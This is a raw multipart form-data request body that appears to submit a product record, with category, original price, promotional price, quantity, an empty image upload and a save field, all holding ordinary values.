-----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="CATEGORY" 3 -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="ORIGINALPRICE" 100 -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="PROPRICE" 100 -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="PROQTY" 100 -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream -----------------------------375756297829058981022228786743 Content-Disposition: form-data; name="save" -----------------------------375756297829058981022228786743--